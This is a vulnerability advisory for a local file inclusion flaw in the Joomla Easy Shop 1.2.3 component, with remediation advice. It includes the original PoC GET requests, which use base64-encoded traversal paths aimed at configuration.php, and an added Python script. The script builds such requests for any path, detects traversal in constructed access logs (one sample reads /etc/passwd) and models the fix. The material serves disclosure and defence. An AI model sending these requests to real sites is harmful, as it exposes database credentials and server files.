Vulnerability Overview
Vulnerability name: Joomla! Component Easy Shop 1.2.3 - Local File Inclusion
EDB-ID: 46219
Author: Ihsan Sencan
Type: Webapps
Platform: PHP
Date: 2019-01-22
Description: The `file` parameter of the `ajax.loadImage` task in com_easyshop takes a base64-encoded file name and does not confine the decoded path to the component's image directory. A traversal path such as `../../configuration.php` is therefore read back to the client, which exposes Joomla's configuration (including the database credentials) and any other file the web server process can read.

Affected Scope
Affected software: Joomla! Component Easy Shop 1.2.3
Tested on: WIN7 x64 / Kali Linux x64
Exploitation precondition: the attacker must know the target's Joomla installation path ([PATH] below; empty for an install at the web root). No other precondition is shown in the PoC; the request carries no session cookie.

Remediation
Official link: Joomla! Extensions, https://extensions.joomla.org/extensions/e-commerce/shopping-cart/easy-shop/
Recommended measures: update to the latest version or apply the vendor-supplied patch. The correct fix on the handler side is to base64-decode the value strictly, canonicalise the resulting path (resolving `..` and symlinks) and serve the file only if it lies inside the image directory. Until a fixed build is deployed, requests with `task=ajax.loadImage` whose decoded `file` value contains a `..` segment or an absolute path can be blocked at the web server or WAF; note that the decoded form must be inspected, since the raw query string never contains `../`.

POC Code
```plaintext
Exploit Title: Joomla! Component Easy Shop 1.2.3 - Local File Inclusion
Dork: N/A
Date: 2019-01-22
Exploit Author: Ihsan Sencan
Vendor Homepage: https://joomtech.net/
Software D.: https://www.joomtech.net/products/easyshop?task=file.download&key=7ba4aafda5995fb3b1383328165df1e10f
Software Link: https://extensions.joomla.org/extensions/e-commerce/shopping-cart/easy-shop/
Version: 1.2.3
Category: Webapps
Tested on: WIN7 x64/KaliLinux x64
CVE: N/A

POC:
1)
http://localhost/[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=[BASE64_FILE_NAME]

GET /[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vY29uZmlndXJhdGlvbi5waHA= HTTP/1.1

GET /[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v... HTTP/1.1
```

The `file` value in the first request is the base64 encoding of `../../configuration.php`. The second request uses a long run of `../` segments (each `Li4v` is one `../`, which is what an attacker sends when the depth of the image directory is unknown); that payload is truncated in this listing before the file name it finally points to, so the target of the second request is not recoverable here.
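The script below is an added example, not code from the advisory or from the Easy Shop component. It builds the PoC request for any target path, decodes the `file` value the way PHP's non-strict `base64_decode()` would (an assumption: the page does not show the handler, and whether it passes the strict flag is unknown), scans constructed access-log lines for traversal in the decoded parameter, and shows a server-side containment check that models the fix. The log lines, IP addresses, paths and the helper names `build_request`, `php_b64decode`, `scan_log` and `safe_image_path` are all assumptions of this example.

```python
"""Probe builder, log detector and fix model for the com_easyshop loadImage LFI.

Added example (not part of EDB-ID 46219 or the Easy Shop code). Assumes the
component base64-decodes ``file`` with PHP's non-strict base64_decode().
"""
import base64
import binascii
import os
import re
from urllib.parse import parse_qs, urlsplit

NON_B64 = re.compile(r"[^A-Za-z0-9+/]")


def encode_file_param(path: str) -> str:
    """Base64-wrap a path the way the ``file`` parameter expects it."""
    return base64.b64encode(path.encode("utf-8")).decode("ascii")


def build_request(base_path: str, target: str, host: str = "localhost") -> str:
    """Raw GET request for the loadImage task. base_path is the Joomla install
    directory ([PATH] on the page); pass "" for an install at the web root."""
    prefix = "/" + base_path.strip("/") if base_path.strip("/") else ""
    return (f"GET {prefix}/index.php?option=com_easyshop&task=ajax.loadImage"
            f"&file={encode_file_param(target)} HTTP/1.1\r\nHost: {host}\r\n\r\n")


def php_b64decode(value: str):
    """Mimic PHP base64_decode() without the strict flag: characters outside the
    alphabet are silently dropped and missing padding is tolerated. Returns
    None only when the remaining data cannot be decoded at all. A detector that
    decodes strictly would miss payloads padded with junk that PHP still reads."""
    cleaned = NON_B64.sub("", value)
    cleaned += "=" * (-len(cleaned) % 4)
    try:
        return base64.b64decode(cleaned).decode("utf-8", "replace")
    except binascii.Error:
        return None


def is_traversal(decoded: str) -> bool:
    """True for absolute paths, Windows drive paths or any '..' segment
    (backslashes count as separators because the PoC was tested on Windows)."""
    p = decoded.replace("\\", "/")
    if p.startswith("/") or re.match(r"^[A-Za-z]:", p):
        return True
    return ".." in p.split("/")


def safe_image_path(image_root: str, file_param: str):
    """Model of the fix (not the vendor's patch): decode strictly, resolve the
    name under image_root and refuse anything that does not land strictly
    inside it after normalising '..' and symlinks."""
    try:
        name = base64.b64decode(file_param, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if not name:
        return None
    root = os.path.realpath(image_root)
    candidate = os.path.realpath(os.path.join(root, name))
    if not candidate.startswith(root + os.sep):
        return None
    return candidate


LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                      r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample access-log lines (not from a real host).
SAMPLE_LOG = """\
203.0.113.10 - - [22/Jan/2019:10:15:01 +0000] "GET /joomla/index.php?option=com_easyshop&task=ajax.loadImage&file=cHJvZHVjdHMvMS5qcGc%3D HTTP/1.1" 200 4821
198.51.100.7 - - [22/Jan/2019:10:16:44 +0000] "GET /joomla/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vY29uZmlndXJhdGlvbi5waHA%3D HTTP/1.1" 200 3127
198.51.100.7 - - [22/Jan/2019:10:16:50 +0000] "GET /joomla/index.php?option=com_content&view=article&id=2 HTTP/1.1" 200 9912
192.0.2.33 - - [22/Jan/2019:10:20:05 +0000] "GET /joomla/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4v%20Li4v%20ZXRjL3Bhc3N3ZA%3D%3D HTTP/1.1" 200 1505
"""


def scan_log(text: str):
    """Return (ip, decoded_path, status) for every loadImage request whose
    decoded ``file`` value escapes the image directory."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        qs = parse_qs(urlsplit(m.group("url")).query)
        if qs.get("option") != ["com_easyshop"] or qs.get("task") != ["ajax.loadImage"]:
            continue
        decoded = php_b64decode(qs.get("file", [""])[0])
        if decoded and is_traversal(decoded):
            hits.append((m.group("ip"), decoded, m.group("status")))
    return hits


if __name__ == "__main__":
    print(build_request("joomla", "../../configuration.php"))
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The fourth sample line shows why the detector decodes leniently: the spaces inside the base64 value make it invalid for a strict decoder, yet PHP discards them and still reads `../../etc/passwd`. The containment check in `safe_image_path` is the part a patch needs; a blocklist on `..` alone does not handle absolute paths or symlinked directories.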